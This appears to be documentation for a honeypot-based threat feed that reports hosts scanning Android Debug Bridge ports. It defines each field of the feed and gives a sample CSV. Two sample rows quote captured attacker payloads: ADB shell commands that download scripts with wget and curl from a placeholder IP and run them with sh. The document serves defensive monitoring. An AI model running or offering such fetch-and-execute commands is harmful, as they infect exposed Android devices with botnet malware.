HIGH: Honeypot ADB Scanner Events Report

DESCRIPTION LAST UPDATED: 2024-01-03

DEFAULT SEVERITY LEVEL: HIGH

This report identifies hosts that have been observed performing scanning activity against Android Debug Bridge (ADB) aware sensors (honeypots).

ADB is a frequent attack vector abused by botnets and other threat actors. If you receive a report from us about an IP observed scanning ADB please make sure to investigate.

For a detailed description of the protocol please reference the writeup here.

Track ADB scans seen by us on the Dashboard, for example here.

Severity levels are described here.

File name: event4_honeypot_adb_scan

Fields

  • timestamp
    Timestamp when the IP was seen in UTC+0
  • protocol
    Packet type of the connection traffic (UDP/TCP)
  • src_ip
    The IP of the device in question
  • src_port
    Source port of the IP connection
  • src_asn
    ASN of the source IP
  • src_geo
    Country of the source IP
  • src_region
    Region of the source IP
  • src_city
    City of the source IP
  • src_hostname
    Reverse DNS of the source IP
  • src_naics
    North American Industry Classification System Code
  • src_sector
    Sector to which the IP in question belongs; e.g. Communications, Commercial
  • device_vendor
    Source device vendor
  • device_type
    Source device type
  • device_model
    Source device model
  • severity
    Severity level
  • dst_ip
    Destination IP
  • dst_port
    Destination port of the IP connection
  • dst_asn
    ASN of the destination IP
  • dst_geo
    Country of the destination IP
  • dst_region
    Region of the destination IP
  • dst_city
    City of the destination IP
  • dst_hostname
    Reverse DNS of the destination IP
  • dst_naics
    North American Industry Classification System Code
  • dst_sector
    Sector to which the IP in question belongs; e.g. Communications, Commercial
  • public_source
    Source of the event data
  • infection
    Description of the malware/infection
  • family
    Malware family or campaign associated with the event
  • tag
    Event attributes
  • application
    Application name associated with the event
  • version
    Software version associated with the event
  • event_id
    Unique identifier assigned to the source IP or event
  • vulnerability_enum
    Vulnerability or exploit schema being used, for example CVE or EDB
  • vulnerability_id
    Id of vulnerability or exploit, for example CVE-2020-5902
  • vulnerability_class
    If set, then CVSS
  • vulnerability_score
    CVSS base score
  • vulnerability_severity
    CVSS severity, for example, CRITICAL or HIGH
  • vulnerability_version
    CVSS version of framework used, for example 3.1 or 3.0
  • threat_framework
    Set to MITRE ATT&CK
  • threat_tactic_id
    Array of tactic ids, example TA0001;TA0002
  • threat_technique_id
    Array of technique ids, example T1190;T1059
  • target_vendor
    Vendor that is being targeted, example Linksys
  • target_product
    Product that is being targeted, example Linksys E-Series
  • target_class
    Class of device/software being targeted, for example router
  • banner
    Part of system identity string
  • commands
    for example, CONNECT, OPEN
  • maxdata
    Maxdata declares the maximum message body size that the remote system is willing to accept
  • system_type
    System type
  • opened
    Message payload

Sample

"timestamp","protocol","src_ip","src_port","src_asn","src_geo","src_region","src_city","src_hostname","src_naics","src_sector","device_vendor","device_type","device_model","severity","dst_ip","dst_port","dst_asn","dst_geo","dst_region","dst_city","dst_hostname","dst_naics","dst_sector","public_source","infection","family","tag","application","version","event_id","vulnerability_enum","vulnerability_id","vulnerability_class","vulnerability_score","vulnerability_severity","vulnerability_version","threat_framework","threat_tactic_id","threat_technique_id","target_vendor","target_product","target_class","banner","commands","maxdata","system_type","opened"
"2010-02-10 00:00:00",tcp,192.168.0.1,60806,64512,ZZ,Region,City,node01.example.com,0,,,,,high,172.16.0.1,5555,65534,ZZ,Region,City,node01.example.net,0,,,adb-scan,,,adb,16777217,,,,,,,,,,,,,,"features=shell_v2,cmd,stat_v2,ls_v2,fixed_push_mkdir,apex,abb,fixed_push_symlink_timestamp,abb_exec,remount_shell,track_app,sendrecv_v2,sendrecv_v2_brotli,sendrecv_v2_lz4,sendrecv_v2_zstd,sendrecv_v2_dry_run_send,openscreen_mdns",,1048576,host,
"2010-02-10 00:00:01",tcp,192.168.0.2,38580,64512,ZZ,Region,City,node02.example.com,0,,,,,high,172.16.0.2,5555,65534,ZZ,Region,City,node02.example.net,0,,,adb-scan,,,adb,16777216,,,,,,,,,,,,,,"features=cmd,shell_v2",,262144,host,"shell:cd /data/local/tmp/;busybox wget http://192.168.0.4//w.sh; sh w.sh; curl http://192.168.0.4//c.sh; sh c.sh; wget http://192.168.0.4//wget.sh; sh wget.sh; curl http://192.168.0.4//wget.sh; sh wget.sh; busybox wget http://192.168.0.4//wget.sh; sh wget.sh; busybox curl http://192.168.0.4//wget.sh; sh wget.sh"
"2010-02-10 00:00:02",tcp,192.168.0.3,36790,64512,ZZ,Region,City,node03.example.com,0,,,,,high,172.16.0.3,5555,65534,ZZ,Region,City,node03.example.net,0,,,adb-scan,,,adb,16777216,,,,,,,,,,,,,,"features=cmd,shell_v2",,262144,host,"shell:cd /data/local/tmp/;busybox wget http://192.168.0.4//w.sh; sh w.sh; curl http://192.168.0.4/c.sh; sh c.sh; wget http://192.168.0.4//wget.sh; sh wget.sh; curl http://192.168.0.4//wget.sh; sh wget.sh; busybox wget http://192.168.0.4/wget.sh; sh wget.sh; busybox curl http://192.168.0.4//wget.sh; sh wget.sh"

Our 124 Report Types